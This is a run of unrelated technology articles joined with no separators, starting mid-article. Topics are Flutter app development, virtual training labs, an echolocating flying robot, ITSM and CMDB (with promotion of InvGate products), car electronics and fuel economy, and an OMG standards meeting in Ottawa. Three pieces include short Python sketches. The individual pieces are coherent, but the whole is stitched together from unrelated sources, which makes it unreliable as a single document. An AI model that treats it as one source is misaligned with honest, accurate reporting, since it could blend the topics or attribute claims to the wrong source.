Flutter is a great choice for small-scale apps that often just display and send data to a server. In such cases, you won’t find yourself running into trouble during development, you will progress quickly, and you’ll need just one team of developers instead of two.

It’s also suited for app prototypes or swift product validation. While there are other tools for prototyping, they are often locked away behind paywalls, and experience is needed to make their use worthwhile. In comparison, Flutter is universal, and its strength lies in the Dart programming language, which lends itself well to implementing prototypes.

When to think twice about using Flutter

It is possible to develop larger apps with Flutter, but they shouldn’t come with too many native features. You also need to be prudent and consider whether the app will scale massively and what other features might be required. Then the disadvantages might be more obvious. But if all these concerns are taken into consideration, there is nothing stopping you from getting on with development.

Flutter is still a somewhat novel tool for developing cross-platform mobile apps, but over the course of its existence, it has come out on top as the most sought-after one. Much like any other technology, it has its share of benefits and challenges. Before you commit to using it, it’s important to think through the features your app will have and whether choosing Flutter will speed things up for your developers. If you get the balance right, using Flutter for app development is a great choice.
Virtual training labs are cloud-based training environments that emphasize an online, hands-on learning experience over a passive classroom-based one. A relatively recent innovation, virtual training platforms have become increasingly popular in the tech industry to train both employees and clients on the complexities of new software.

CloudShare virtual training lab environment – classroom

What Are Virtual Training Labs’ Benefits?

Virtual training tools offer a variety of benefits that make them an attractive choice for customer training and software demonstrations:
- They offer a direct, interactive connection with the training environment.
- They can be accessed from any machine with an Internet connection.
- They are easily accessible by a larger portion of students.
- They have the benefit of in-person training with a real instructor.

The Advantage of Virtual Training Labs Over Traditional Classrooms

Interactive and immersive learning through virtual training is replacing the passive learning style of traditional classrooms and training environments for several reasons, including:
- Virtual labs are much less expensive, since the travel expenses, IT resources, and laboratory maintenance necessary for classroom lessons aren’t as prominent.
- Without the need for physical travel, virtual classrooms are more convenient for both students and instructors.
- Physical classrooms are difficult to scale for larger groups of students, as the cost of scheduling meetings rises exponentially with more clients. Virtual environments and lessons can be taken anywhere around the world using a simple browser.
- The interactive nature of virtual training labs enables the optimal conditions for knowledge retention.

Why Virtual Labs Are More Efficient

The tech industry often trains its clients on how to use new software through virtual means, since learning retention is consistently higher. Virtual training tools encourage the following:
- Learning by doing rather than watching. A University of Chicago study revealed that physical training had a larger impact on student skill than passive learning in the field of science. It’s no different when it comes to training customers to use your software.
- Replicating realistic situations. Expect a stronger understanding to develop in learners when training replicates scenarios that they will experience themselves.
- Virtual environments. Virtual labs allow instructors to create an active learning environment by answering the students’ questions and communicating through the cloud.
- Desktop sharing with the instructor. Instructors can monitor multiple screens at once and ensure that their learners are approaching tasks correctly.
Flying Robot Uses Echolocation for Search and Rescue Operations

The small-scale robot uses a buzzer and microphones to build a map of its environment.

Echolocation could help small flying robots navigate their surroundings, much like bats, in a development researchers hope could aid robot deployment in search and rescue missions. The team of researchers, from Canada’s University of Toronto and the Swiss Federal Institute of Technology, used a small microphone and speaker to give a robot echolocation capabilities.

In tests, the robot’s speaker lets out bursts of sound at different frequencies, which bounce off the robot’s surroundings and are recorded by the microphone. An algorithm then interprets the sound waves to make a virtual map of the environment. In trials, the flying robot could map walls with up to 0.7-inch accuracy from 1.6 feet away when stationary, and with 3.1-inch accuracy when airborne.

“For safe and efficient operation, mobile robots need to perceive their environment, and in particular, perform tasks such as obstacle detection, localization, and mapping,” the team said. “We propose an end-to-end pipeline for sound-based localization and mapping that is targeted at, but not limited to, robots equipped with only simple buzzers and low-end microphones. The method is model-based, runs in real time, and requires no prior calibration or training.”

The team’s model also avoids the need for bulky or heavy hardware often unfeasible for installation on a small-scale robot. Possible use cases include search and rescue missions and reaching hard-to-access areas that may be cut off from light. While the team found the model was not as accurate as those with hardware systems including GPS or camera arrays, plans are underway to continue fine-tuning the design to improve accuracy. One day, the team said, it hopes the robot can echolocate using only its own noises (such as its propeller whirring), rather than having to emit sounds.
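The researchers' pipeline is model-based and considerably more sophisticated, but the core geometry, timing an echo and converting the delay to distance, can be shown in a few lines. The following Python sketch is illustrative only: it assumes a single emitted burst, one microphone, and the numpy library; real systems sweep frequencies and fuse several microphones.

```python
import numpy as np

SPEED_OF_SOUND = 343.0   # m/s in air
SAMPLE_RATE = 48_000     # Hz

def estimate_wall_distance(emitted: np.ndarray, recorded: np.ndarray) -> float:
    """Find the echo delay by cross-correlation and convert it to distance."""
    corr = np.correlate(recorded, emitted, mode="full")
    lag_samples = int(np.argmax(corr)) - (len(emitted) - 1)
    round_trip_s = lag_samples / SAMPLE_RATE
    return SPEED_OF_SOUND * round_trip_s / 2.0  # sound travels out and back

# Synthetic test: a 1 kHz burst whose echo returns after the delay expected
# for a wall 0.5 m away.
t = np.arange(0, 0.002, 1 / SAMPLE_RATE)
burst = np.sin(2 * np.pi * 1_000 * t)
delay = int((2 * 0.5 / SPEED_OF_SOUND) * SAMPLE_RATE)
recording = np.zeros(delay + len(burst))
recording[delay:] += 0.3 * burst  # attenuated echo

print(f"estimated distance: {estimate_wall_distance(burst, recording):.2f} m")
```

Emitting bursts at several frequencies, as the robot does, lets the algorithm separate overlapping echoes from multiple walls, which is what turns single distance estimates into a map.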
Have you ever found yourself confused by the overlapping terms in IT Management? This article will clarify these concepts, starting with their definitions and highlighting how they interconnect. By the end of this read, you’ll gain insights into how these elements work together to improve your organization’s IT landscape. Let’s dive in!

What is Information Technology Service Management (ITSM)?

IT Service Management is a comprehensive approach that encompasses the planning, delivery, management, and improvement of IT services within an organization. It focuses on aligning IT services with the needs of the business and ensuring that IT supports business objectives effectively. ITSM encompasses various processes, including Incident Management, Problem Management, Change Management, and Service Request Management, all aimed at enhancing customer satisfaction and optimizing service delivery.

At its core, ITSM is about creating value for customers through effective Service Management practices. This involves not only delivering IT services but also continuously improving them based on feedback and changing business requirements. By implementing ITSM frameworks, organizations can streamline their operations, reduce service costs, and improve overall efficiency.

What is a Configuration Management Database (CMDB)?

A Configuration Management Database (CMDB) is a centralized repository that stores information about the configuration items (CIs) within an organization’s IT infrastructure. CIs can include hardware, software, network components, and other critical assets that need to be managed to ensure effective service delivery. Within IT Asset Management, the CMDB acts as a comprehensive visual map of these components, their relationships, and their configurations.

The CMDB is an integral part of ITAM, which refers to the processes involved in managing IT assets throughout their lifecycle. ITAM focuses on tracking and managing the financial, contractual, and inventory aspects of IT assets, ensuring that organizations maximize their value while minimizing risks. By integrating ITAM with a CMDB, organizations can gain a holistic view of their IT environment, enabling better decision-making and risk management.

ITSM, CMDB: How are they different?

While ITSM and CMDB are interconnected, they serve different functions within an organization. Understanding these differences is crucial for effective IT management.

1) Purpose and focus

ITSM is primarily concerned with the overall management of IT services, focusing on delivering value to customers and improving service quality. It encompasses various processes that ensure IT services are aligned with business needs. The CMDB, on the other hand, serves as a repository for configuration data, focusing on the relationships and dependencies between various CIs. It provides the necessary information to support ITSM processes, enabling organizations to manage their IT environment effectively.

2) Data management

In ITSM, data is used to inform Service Management processes, such as incident resolution and change management. ITSM tools leverage data from the CMDB to make informed decisions about service delivery. The CMDB stores detailed information about each CI, including attributes, relationships, and dependencies.
This data is crucial for understanding how changes to one component can impact others, thereby supporting effective incident and change management.

3) Integration with other processes

ITSM integrates various processes, including Incident Management, Problem Management, and Change Management. It aims to create a seamless flow of information and collaboration among IT teams to enhance service delivery. The CMDB acts as a central repository that feeds data into these ITSM processes, ensuring that teams have access to accurate and up-to-date information when making decisions. This integration is essential for minimizing downtime and improving overall service quality.

4) Impact on business operations

ITSM directly impacts customer satisfaction by ensuring that IT services meet business needs and expectations. By focusing on service quality, organizations can enhance their reputation and build stronger relationships with customers. The CMDB supports ITSM by providing visibility into the IT landscape, enabling organizations to assess risks, troubleshoot issues, and plan for changes effectively. This visibility is critical for maintaining service continuity and minimizing disruptions.

5) Role in compliance and risk management

ITSM processes often require compliance with industry standards and regulations. Effective ITSM practices help organizations demonstrate compliance and manage risks associated with service delivery. The CMDB plays a vital role in Compliance Management by tracking changes and maintaining accurate records of configuration items. This capability allows organizations to identify unauthorized changes, ensuring that they can respond promptly to potential security and regulatory risks.

Why is a Configuration Management Database important?

The importance of a CMDB cannot be overstated. It serves as the backbone of effective IT Service Management and Asset Management, providing organizations with several key benefits:
- Enhanced visibility: A CMDB offers a comprehensive view of the IT infrastructure, enabling organizations to understand the relationships between various components. This visibility is crucial for effective decision-making and risk assessment.
- Improved Incident Management: By providing detailed information about CIs and their interdependencies, a CMDB helps IT teams respond more effectively to incidents. Teams can quickly identify affected components and implement appropriate solutions, minimizing downtime.
- Support for Change Management: The CMDB enables organizations to assess the impact of changes on the IT environment. By understanding how changes will affect various components, organizations can plan more effectively and reduce the risk of disruptions.
- Facilitating root cause analysis: When incidents occur, the CMDB provides valuable data that can help teams perform root cause analysis. By understanding the relationships between CIs, teams can identify the source of issues more quickly and implement corrective actions.
- Regulatory compliance: Maintaining accurate records of configuration items is essential for compliance with industry regulations. A CMDB helps organizations track changes and ensure that they can demonstrate compliance when required.

Asset Management software solutions

Organizations need robust Asset Management solutions to manage their IT assets effectively. These solutions provide the tools necessary to track, manage, and optimize IT assets throughout their lifecycle, and they often integrate with a CMDB to provide a holistic view of the IT landscape.
By combining Asset Management with Configuration Management, organizations can ensure that they have accurate and up-to-date information about their IT assets and their relationships.

Introducing InvGate Insight

InvGate Insight is a powerful Asset Management solution that helps organizations manage their IT assets effectively. With its user-friendly interface and robust features, InvGate Insight simplifies the process of tracking and managing assets, enabling IT teams to focus on delivering value to the business.

One of the standout features of InvGate Insight is its integration with a CMDB. This integration allows organizations to maintain a centralized repository of configuration data, ensuring that they have access to accurate information when making decisions. By leveraging InvGate Insight, organizations can enhance their Asset Management processes and improve overall service delivery. Plus, it natively integrates with the ITSM solution InvGate Service Desk. This ensures that all configuration item-related data and the CMDB are accurate and up to date, facilitating efficient Incident, Problem, and Change Management, and thereby improving overall ITSM and compliance.

How can InvGate Insight help?

InvGate Insight offers several key benefits that make it an essential tool for organizations looking to optimize their Asset Management processes:
- Centralized repository: By maintaining a centralized repository of configuration data, InvGate Insight ensures that IT teams have access to accurate and up-to-date information about their assets and their relationships.
- Improved visibility: The software provides a comprehensive view of the IT landscape, enabling organizations to understand the interdependencies between various components. This visibility is crucial for effective decision-making and risk assessment.
- Streamlined Incident Management: With detailed information about configuration items, and through its integration with the service desk, InvGate Insight helps IT teams respond more effectively to incidents. Teams can quickly identify affected components and implement solutions, minimizing downtime.
- Enhanced Change Management: The integration with a CMDB allows organizations to assess the impact of changes on the IT environment. By understanding how changes will affect various components, organizations can plan more effectively and reduce the risk of disruptions.

To sum up

In conclusion, understanding the differences between ITSM and CMDB is essential for effective IT management. While ITSM focuses on delivering value through Service Management processes, the CMDB serves as a centralized repository of configuration data that supports these processes. By leveraging a CMDB, organizations can enhance their visibility into the IT landscape, improve incident and change management, and ensure compliance with industry regulations.

As organizations continue to evolve in the digital age, the importance of effective Asset Management and service delivery cannot be overstated. By integrating ITSM with a robust CMDB, organizations can optimize their IT operations and drive business success.

Frequently Asked Questions

1. What is the main purpose of ITSM?

ITSM focuses on the planning, delivery, management, and improvement of IT services within an organization, ensuring that IT supports business objectives effectively.

2. How does a CMDB support ITSM processes?
A CMDB provides a centralized repository of configuration data that informs ITSM processes, enabling organizations to manage their IT environment effectively and make informed decisions.

3. Why is a CMDB important for organizations?

A CMDB enhances visibility into the IT infrastructure, improves incident and change management, facilitates root cause analysis, and supports regulatory compliance.

4. How can InvGate Insight help with Asset Management?

InvGate Insight offers a centralized repository of configuration data, improved visibility into the IT landscape, and streamlined incident and change management processes, helping organizations optimize their Asset Management practices.
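To ground the idea, here is a minimal Python sketch of what a CMDB stores and the question Change Management asks of it. The CI names and relationship types are invented, a real CMDB tracks far more attributes, and the sketch assumes an acyclic dependency graph.

```python
from dataclasses import dataclass, field

@dataclass
class ConfigurationItem:
    name: str
    ci_type: str                              # e.g. "server", "application"
    depends_on: list = field(default_factory=list)

class CMDB:
    def __init__(self):
        self.items: dict[str, ConfigurationItem] = {}

    def add(self, ci: ConfigurationItem) -> None:
        self.items[ci.name] = ci

    def impact_of(self, name: str) -> set[str]:
        """Everything that transitively depends on the given CI, which is
        what Change Management needs to know before approving a change.
        Assumes the dependency graph has no cycles."""
        impacted = set()
        for ci in self.items.values():
            if name in ci.depends_on:
                impacted.add(ci.name)
                impacted |= self.impact_of(ci.name)
        return impacted

cmdb = CMDB()
cmdb.add(ConfigurationItem("db-01", "server"))
cmdb.add(ConfigurationItem("orders-db", "database", ["db-01"]))
cmdb.add(ConfigurationItem("webshop", "application", ["orders-db"]))

# Planning maintenance on db-01? The CMDB shows what the change would touch.
print(cmdb.impact_of("db-01"))   # {'orders-db', 'webshop'}
```

The relationship data is what distinguishes a CMDB from a flat asset inventory: the inventory knows the server exists, while the CMDB knows which services go down with it.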
What is the biggest difference between humans and animals? This question has been asked many times, evoking a range of different answers. “Being able to use tools” is one of the most frequently cited differences. However, it was found that there are in fact animals that use objects such as stones or twigs to catch prey, in some cases even shaping these objects before use. So the description of the difference has been amended to “Only humans create tools to make other tools.”

Be that as it may, it certainly can be said that the advancement of humanity and the progress of civilization was driven by the discovery and continuous improvement of tools. And in our modern age, many of these tools are being made more convenient, more powerful, and more functional by the application and evolution of electronics technology.

■Cars and electricity have been closely linked from the start

A prime example of this development is the automobile. Even in its earlier stages, the car would not have been possible without electricity. The internal combustion engine requires an electrical spark from a spark plug to ignite the fuel, and without the electric starter motor, even getting the engine to run would be a major undertaking. Without headlights or windshield wipers, the car could not drive at night or in the rain, and without brake lights or winkers, the number of collisions would certainly rise. We can categorize these types of equipment as “electrical equipment necessary for moving the car.”

Electrical equipment commonly used in automobiles

On the other hand, the value of the car as a product has increased through the addition of electrical equipment that makes driving more pleasurable, such as air conditioning, car audio systems, car navigation systems, etc. Various sensors are indispensable for the electronic systems controlling the engine and other aspects of the car. In recent years, it has become more common to take some of the information provided by these sensors and present it to the driver in an easy-to-grasp format, thereby contributing to more efficient and better driving.

For example, an indicator that directly shows the actual fuel consumption at any moment helps enormously with realizing fuel economy, and indicators showing the timing for oil changes and other necessary actions help to keep the car in optimum condition. A system that warns the driver when the external temperature drops below three degrees centigrade alerts him or her to the possibility of road surface freezing. Recently, some manufacturers equip their cars with systems that can analyze driving patterns and provide guidance for safe and economical driving. Tire pressure warnings, anti-lock braking systems (ABS), electronic slip control (ESC), collision prevention systems, and similar features that contribute actively to driving safety are being increasingly included as standard equipment. We may call this category “electrical equipment for comfort and safety.”

Over the course of the past twenty years or so, the importance of new electronics technologies has increased notably. In order to preserve the earth’s environment and resources, improving the fuel economy of cars has become a critical and pressing goal, and electronic systems that directly contribute to better performance are attracting wide interest. Developments in this field began in the mid-1970s, starting with electronic control for ignition and fuel systems.
What originally had been performed by purely mechanical means now was put under electronic control, resulting in drastically improved flexibility. Suddenly, it became possible to adjust the amount of fuel supplied to the engine as well as the ignition timing over a much wider range. This in turn enabled designers to successfully combine output performance with cleaner exhaust emissions.

Nevertheless, until about ten years ago, a car with a displacement in the 2-liter class consumed about 1 liter of fuel for every 10 kilometers when driving in an urban environment. By contrast, cars in the same class these days habitually get about 15 to 20 kilometers per liter. The biggest reason why this improvement in fuel economy came about is the introduction of fuel economy standards worldwide, such as the CAFE (Corporate Average Fuel Economy) standard. If average fuel consumption figures calculated on the basis of every car sold by a manufacturer do not meet certain CAFE standards, the manufacturer’s name may be made public, penalties may apply, or a limit may be imposed on the number of cars that can be sold. Because this especially affects manufacturers with high sales figures for large and luxurious cars that tend to consume more fuel, there is strong pressure on improving the fuel economy of all models in a company’s lineup.

■Electronics technologies helping to improve fuel economy

There are largely four different approaches to improving the fuel economy of an automobile. The first is improving the fuel performance of the engine itself. The second approach involves assistive systems or devices that provide improvements in areas where the engine is weak. Third is the reduction of air resistance while the car is driving. And finally, there is reduction in the weight of the automobile. Two of these approaches are intricately linked to electronics technology.

Electrical equipment for improving the fuel performance of an engine

The first task is improving the fuel performance of the engine itself. In fact, there is not all that much that can be done in this area. The three possible aspects are “improved combustion,” “reduced resistance,” and “reduced losses.” And for each of these, electronics technology presents an effective solution.

A representative example of an effective technology for improving combustion is known as the variable valve lift and timing system. A fuel-air mixture is introduced into an internal part of the engine called the cylinder. It is then compressed and made to ignite, allowing the retrieval of kinetic energy. When combustion is finished, the remaining gas is expelled to the outside, and the process starts all over again. During the compression and combustion phases, the cylinder must be tightly sealed, but to allow the introduction of air, the so-called intake valve must be opened, while the exhaust valve must be opened in order to release the exhaust gas. The amount of air that can be introduced and expelled depends on the open/close timing of the valve as well as on the degree to which it is opened, which is called lift. The parameters for optimal valve open/close timing and valve lift differ significantly according to the actual driving conditions of the car. In combustion engines of about 20 years ago, the valve open/close timing was governed by a mechanical arrangement with a fixed operation scope.
If lift and timing were optimized for the relatively low engine speeds prevalent under normal driving conditions, the engine could not really be driven into high rpms, resulting in an engine that was considered to be deficient in power. This limitation was removed by the introduction of variable valve timing systems, allowing the open/close timing to be adjusted according to engine speed. While early systems used a simple hydraulic mechanism capable of switching only between two stages, this has been progressively replaced by continuously variable systems driven by an integrated electric motor or similar, thereby allowing detailed and continuous control over valve timing. The powerful modern engines of today with good fuel economy would not be possible without this development. Increasingly, such systems not only control the open/close timing, they also allow adjustment of valve lift, resulting in complex systems known under names such as “continuously variable valve lift and timing.” Different manufacturers employ different construction principles, but the use of oscillating cams controlled by stepping motors or similar is the most common approach.

Also, in order to ensure that the open/close timing of valves is always optimal, the condition of various parts of the engine must always be monitored very closely and accurately. For this purpose, a large number of sensors are mounted to provide data about temperature, pressure, and other engine parameters. These data assist the variable system in achieving the best timing for the current situation. The sensor information is also used for integrated control of ignition timing and fuel injection timing by an ECU; a sketch of this kind of map-based control appears at the end of this article. The high performance of modern sensors, combined with the high performance of the control systems, is what enables modern engines to deliver both high output power and good fuel economy.

The next aspect is reduced resistance. The most effective way to achieve this is increasing the precision of the parts that make up the engine. Another effective measure is to substitute electric power for driving accessories that used to be driven directly by the engine. A prime example of this approach is the water pump that circulates coolant between the engine and the heat exchanger. In older-style engines, a part of the output was used to drive the pump directly, but by driving the pump electrically, the resistance during engine operation can be reduced.

Designing accessories to operate electrically makes it possible to have them function on demand, that is, only when needed. This also helps to reduce resistance. A mechanical water pump itself is not equipped with a means for flow control. Rather, it is always operating, and coolant temperature is adjusted by a thermostat. An electric water pump, on the other hand, can be made to operate only when a change in coolant temperature is required, thereby preventing unnecessary transfer of thermal energy to the coolant. Cars equipped with an automatic function to turn off the engine when idling use a dedicated electric oil pump for generating the required hydraulic pressure while the engine is stopped. This can also be considered an aspect that contributes to enhanced fuel economy.

■Hybrid: a smarter solution

Finally, consider the possibilities for fuel economy improvement through assistive devices other than the combustion engine. When starting to move from the stopped condition, or when accelerating rapidly, a car requires a high amount of power.
However, at other times, such as when driving at a constant speed for an extended period of time, the power required is said to be only on the order of some 30 kW. By selecting an engine with a smaller displacement and therefore better basic fuel economy, and only providing additional power from an electric motor when higher power for acceleration is required, one gets a hybrid vehicle.

Until quite recently, hybrid configurations could be divided into two main types: “using an electric motor to allow the combustion engine to operate always in its efficient range” and “assisting the combustion engine in its weaker range with an electric motor.” More complex hybrid configurations have appeared recently, but the basic fact that an electric motor in conjunction with a combustion engine is used to improve fuel economy still applies. In addition, features such as regenerative braking, turning off the engine when stopped, and EV drive mode also help to save fuel.

A new type of hybrid power unit

Hybrid vehicles with simpler configurations than current designs will probably make their appearance before long. In particular, for cars with a transverse combustion engine and front-wheel drive, a hybrid configuration where the output of the electric motor is introduced at the final gear reduction unit is expected to become widely adopted. This configuration offers a number of advantages, such as the fact that it is relatively easy to realize also in lower-priced models, and weight increase can be kept to a minimum.

It is certain that automotive engines will be designed to interact even more closely with electric motors in future. For example, in the pinnacle of motor sports, the F1 power unit will employ a so-called MGU-H (Motor Generator Unit – Heat) configuration from 2014. The MGU-H is a combination of turbocharger and generator. At low revolution speeds, when the engine exhaust power is low, the generator functions as a motor that quickly increases the revolution of the turbocharger. As soon as the turbocharger revolution speed is high enough, the generator produces electricity for charging the battery bank of the drive assist system. Because this allows the combination of even higher fuel efficiency with high output power, the concept is garnering worldwide attention and may come to represent a new racing engine generation.

MGU-H system to be incorporated in F1 engines from 2014

The progress of automobile engines from now on is intricately linked to electric motors, sensors, and microcontrollers. The combination of these elements working together in unison has reached a level that in effect could be called “robotic.” The increasing sophistication of car electronics technology makes cars more intelligent and smart, acting as a motivating force towards exploring new frontiers.
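To illustrate the integrated control described earlier (sensors feeding an ECU that looks up optimal settings for the current situation), here is a minimal Python sketch of map-based cam-timing control. The table values and axes are invented for illustration; production calibrations are far denser and engine-specific. The numpy library is assumed.

```python
import numpy as np

RPM_AXIS  = np.array([1000, 2000, 4000, 6000])       # engine speed
LOAD_AXIS = np.array([0.2, 0.5, 0.8, 1.0])           # normalized load
# Intake-cam advance in crank degrees for each (load, rpm) cell.
ADVANCE_MAP = np.array([
    [ 5, 10, 18, 22],
    [ 8, 14, 24, 28],
    [10, 18, 30, 34],
    [12, 20, 32, 38],
], dtype=float)

def cam_advance(rpm: float, load: float) -> float:
    """Bilinear interpolation between the four surrounding map cells."""
    r = np.clip(rpm, RPM_AXIS[0], RPM_AXIS[-1])
    l = np.clip(load, LOAD_AXIS[0], LOAD_AXIS[-1])
    # Interpolate along the rpm axis for each load row, then along load.
    per_row = [np.interp(r, RPM_AXIS, row) for row in ADVANCE_MAP]
    return float(np.interp(l, LOAD_AXIS, per_row))

# The control loop would call this every cycle with live sensor values.
print(f"advance at 3000 rpm, 60% load: {cam_advance(3000, 0.6):.1f} deg")
```

The same pattern of sensor input, calibration map, and actuator command underlies ignition timing and fuel injection control as well, which is why the article describes the whole arrangement as approaching something "robotic."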
How do standards grow?

“It all starts with standards – they are at the heart of interoperability,” Canada’s Director of Digital Exchange Teresa D’Andrea concluded, as she summarized the government use case at the OMG’s Technical Meeting in Ottawa. But these must be highly consumable (take no more than 30 minutes for a technologist to understand) to drive usage.

The OMG consortium has internalized this fundamental principle in its standards work through adoption of a models-driven approach. As Ed Seidewitz, CTO of OMG member company Model Driven Solutions, explained at the Ottawa session, “a model is recognizable. It faithfully represents some things, but not everything. By describing something under study, it promotes understanding, and specifies what needs to be built.” A modeling language, by extension, is a formal language for writing models, written as a set of statements that describe a system (for analysis), and describe requirements (for engineering). As examples, Seidewitz pointed to mathematics as the modeling language for scientific models, and programming languages as the modeling languages for computation.

OMG’s mandate has been to develop standards for modeling languages, as these provide “common understanding”: “it’s important to standardize,” he explained, “in order to communicate.” OMG’s first standard – the Unified Modelling Language (UML) – was created in 1997 as the technical basis for designing and communicating distributed systems. Since then, OMG has developed specific profiles for UML based on different technical use cases, such as timing and integration and business processes. Ultimately, two families of standards have been created: one for the analysis, design and implementation of software-based systems, and one for modeling business and similar processes.

On the software side, these now include: SysML for Systems Engineering; MARTE for the Modeling and Analysis of Real Time Embedded Systems; SoaML, the Service Oriented Architecture Modeling Language; UAF, the Unified Architecture Framework; fUML, the Foundational Subset for Executable UML Models; Alf, the Action Language for fUML; and PSCS, Precise Semantics for UML Composite Structures.

On the business front, the Business Process Model and Notation specification (BPMN), which is now also a recognized ISO standard, is a graphical notation for business processes that defines notation and semantics in diagrams for Process Orchestration and Choreography, Collaboration, and Conversation (detailed messaging on how processes in a choreography talk to each other). Other business process specifications include CMMN – Case Management Model and Notation (a common meta model and notation for modeling and graphically expressing a case), DMN – Decision Model and Notation (which describes how to make decisions to enable automation), and VDML (Value Delivery Modeling Language).

Since this (abbreviated!) list of different technical and business process specifications fails the test of ‘easily consumable’, Seidewitz provided Ottawa Technical Meeting attendees with an example scenario – the use of the UML business process framework to create an online shopping experience. He began with a schematic diagram outlining various functional processes needed to support the primary actor (the customer), and the relationships between bubbles representing the customer and secondary actors (vendor, authenticator, shipper) in the shopping process.
Over this, Seidewitz overlaid a UML activity diagram, shifting to a shopping system architecture using a composite structure diagram showing IT subsystems (components such as search engine, management component, online shopping, authentication, customer management, order management, and inventory management). As a next step, he defined the interfaces between components, and paths for communications via nodes, to create a design. Using a sequence diagram that focuses on the lifelines – or messages that are passed between components – he was able to model the interaction between components to complete the architecture.

According to Seidewitz, “modeling helps you to find problems in your system – missing interfaces, for example – and you can check each use case scenario, and then validate the design (or potentially add in the missing interface!).” The Holy Grail, he noted in a systems engineering use case for optimizing vehicle manufacture, is to create a “system of systems” with traceability and plug-in capabilities that allow designers to quickly check and modify system design.

Scaling standards efforts

As he outlined UML evolution, Seidewitz also discussed the process for setting research and work priorities in standards development. He explained that the OMG organizers rely on the community to decide what research is necessary next, and he urged members to join one of its task forces – these assess development efforts and needs, and then issue an RFP inviting community members to come together to work on a specific industry issue.

At the Ottawa Meeting, several OMG members presented on work completed in one or more areas through leverage of the models-based approach and use of one or more specifications to solve a new issue. For example, Nick Mansurov, CTO at KDM Analytics, reported on progress made by the Systems Assurance Task Force on development of the Model-Based Cybersecurity Assessment (MBCA). His talk focused on the use of MBCA with the Unified Architecture Framework (UAF) to identify, analyze, classify and understand cybersecurity threats – and how, by plugging UAF into risk analysis, it is possible to automate the processes for repeatable security assessment.

In his presentation, Denis Gagné, CTO and CEO, Trisotech, described application of the OMG “Triple Crown,” the three complementary business process standards BPMN, CMMN and DMN, to build continuous operational process improvement. Within the BPMN specification, he explained, each shape has one meaning, and because there is a universal graphical notation for drawing business processes, a diagram can automate the creation of executable code, bridging the gap between modeling and subsequent action. A circle means an event, a rectangle is an activity, and a diamond is a gateway – which together can describe process sequence flow. According to Gagné, “It’s simple, but powerful, because the business user can quickly understand the model – this flowcharting is an abstraction that is pretty natural and a good way to communicate with business,” who are the ultimate process owners.

Another business-focused presentation was made by Claude Baudoin, principal consultant at cébe IT and Knowledge Management, who reported on preliminary definitions work that has been developed in two discussion papers published by the OMG Data Residency Working Group.
Another business-focused presentation was made by Claude Baudoin, principal consultant at cébe IT and Knowledge Management, who reported on preliminary definitions work developed in two discussion papers published by the OMG Data Residency Working Group. The goal of this group is to create standard definitions of regulations in various jurisdictions and to define sensitive data, so that tools can be developed to better manage the movement of data from one location to another. Another aim is to establish process around data governance. Baudoin argued for the establishment of a detailed governance structure, with clear roles and responsibilities – "if everyone's in charge, no one is in charge," he added – as well as proper metadata management based on defined processes and rules on sensitive information.

For his part, John Butler, principal at Auxillium Technology Group, discussed early efforts by the OMG Provenance and Pedigree Working Group to establish standards for tracking and exchanging information that can identify the provenance of digital and physical artefacts, as well as their lineage (who touched the data during processing). This information will play an increasingly important role in the development of data trust, which applies across a range of applications, such as maritime safety (the working group's original research area), supply chain, citations and fake news, electronic health records, records management, quality assurance and the use of test data. The group's proposed information model will include areas such as ownership of the data, custody, origin, transformation, and the identification of roles in the ecosystem.

Support for Canadian innovation

As the task force activities described above show, much of the OMG's current group work is designed to support the creation of standards and best practices in information management. This is not surprising, given data growth in the last decade and our increasing focus on deriving value from information assets. In the data value proposition, sharing occupies a critical space – data that is stored in siloed repositories rarely delivers its full potential benefit. But at the same time, data must be secured.

In a session on Data Tagging and Labelling, Mike Abramson, CEO of the Advanced Systems Management Group, spoke to the potential for conflict between open and secure data. Citing the former director of US National Intelligence, James Clapper, Abramson pointed to "the need to find the sweet spot between sharing and protecting information. This paradox exists in every domain where sensitive information needs to be shared and used: in open data, open government, public safety, healthcare, and financial services." According to Abramson, the answer lies in "Responsible Information Sharing," which maximizes sharing while simultaneously safeguarding sensitive data. The key, he argued, lies in metadata – in the creation of the Information Exchange Framework (IEF), which applies different types of contextual tags (descriptive, structural, administrative, provenance and pedigree, security, discovery, and handling instructions) to enforce policy around information sharing and security.

Advanced Systems Management Group's work in this area began 25 years ago, and the firm's engagement to help manage the sharing of NATO coalition data between the US, the UK, and Turkey helped Abramson recognize that "what you are willing to share," in this kind of scenario, "is problematic." Similarly, data transfer was challenging: "Originally, information managers were hardcoding their integrations, their APIs. But after six months, they had no idea what their interfaces were doing, and their interfaces never survived 'first contact' with the enemy.
They had no way of updating them in a timely manner." To enable information sharing, Abramson looked first for an existing interface application that would support integration. Since none existed, his team began to develop a modeling technique – a profile for UML – to see if this could be used to generate interfaces. Their solution involved applying metadata in real time, ingesting rules along with data, and managing both at run time. To prove out this approach, Advanced Systems developed a technology demonstration for Public Safety and Security in Shared Services Canada; however, at that time no pilot mechanisms existed in the Canadian government, save for limited, specialized applications in the National Research Council.

Abramson's team, however, was able to work on this broad interoperability challenge with the support of the OMG community. Led by Abramson, members of the OMG Command, Control, Communications, Collaboration and Intelligence Domain Task Force and the IEF Working Group have designed the IEF, a framework and reference architecture based on open standards for policy-driven, data-centric and user-specific information sharing and safeguarding (ISS). It delivers defence in depth to the data layer, responsible information sharing, delivery of the right, quality information to the right decision maker at the right time, and day-0 capability. The first IEF specification, the IEPPV (Information Exchange Packaging Policy Vocabulary), has also been published – a policy vocabulary and UML profile for the secure packaging and processing of structured information elements. The IEF is platform independent – it may be implemented using one or more vendor products and services that can be integrated through standardized interfaces, messages and protocols.

Abramson explained: "In our metadata, the way we build the models, aggregate, and transform, we can mark in real time labelling and tagging of data. We can redact – we can pull out pieces that individuals can't see. The recipient may be an individual, or a community of practice, a community of interest. We can control what information goes to the community. If I'm using an IEPPV-type message, I have one definition of the message and it's the content of the message that I'm controlling, not the structure of the message. That's where the innovation lies." Furthermore, "we can control content to the individual recipient based on their authorizations and role, based on what the data owner determines is the risk. I separate the policies from the executable (a router or a database, for example) and manage them separately. Which means I can deploy my tech, and configure my tech for my mission."

Since it is managed through policy, an IEF database can automate design-time ISS simulation and analytics assessments, triggering changes that might be required throughout all associated elements. In addition, there is an administrative interface that allows the user to go in and change and administer the policies. The result, according to Abramson, is increased flexibility, agility and adaptability on the information sharing front, as well as reduced cost and risk in information management overall. And because the IEF is model driven (not just code), users are able to retain institutional membership in the standards ecosystem to take advantage of new adaptations and extensions going forward. "This technology is all Canadian innovation," Abramson explained; it was modeled, polished and finalized with the help of the broader community.
